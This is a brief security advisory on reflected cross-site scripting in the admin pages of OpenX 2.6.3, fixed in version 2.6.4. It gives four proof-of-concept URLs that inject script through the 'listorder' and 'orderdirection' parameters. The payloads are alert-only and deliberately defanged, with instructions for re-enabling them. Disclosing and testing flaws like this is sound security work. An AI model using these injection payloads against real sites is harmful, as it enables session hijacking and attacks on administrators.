SecurityGyan

###############################################################################

OpenX 2.6.3 orderdirection and listorder parameter XSS Vulnerability

Input passed to the “orderdirection” and “listorder” parameters in
“www/admin/userlog-index.php” and “www/admin/stats.php” is not
properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user’s
browser session in the context of an affected site.

Vulnerability fixed in 2.6.4

http://www.openx.org/ad-server/download

Published at:http://www.packetstormsecurity.org/0902-exploits/openxorderdir-xss.rar
###############################################################################

exploit1:
filename:www/admin/userlog-index.php
parameter:listorder

POC:

http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated’;<#script>alert(String.fromCharCode(88,83,83))&orderdirection=down

exploit2:
filename:www/admin/userlog-index.php
parameter:orderdirection

POC:

http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated&orderdirection=down';<#script>alert(String.fromCharCode(88,83,83))

exploit3:
filename:www/admin/stats.php
parameter:listorder

POC:

http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&listorder=name';<#script>alert(String.fromCharCode(88,83,83))&orderdirection=up&day=&setPerPage=15&entity=global&breakdown=history&period_preset=all_stats&period_start=&period_end=

exploit4:
filename:www/admin/stats.php
parameter:orderdirection

POC:

http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&listorder=name&orderdirection=up';<#script>alert(String.fromCharCode(88,83,83))&day=&setPerPage=15&entity=global&breakdown=history&period_preset=all_stats&period_start=&period_end=

Note:remove # character from starting script tag in all pocs to reproduce this vulnerability.

###############################################################################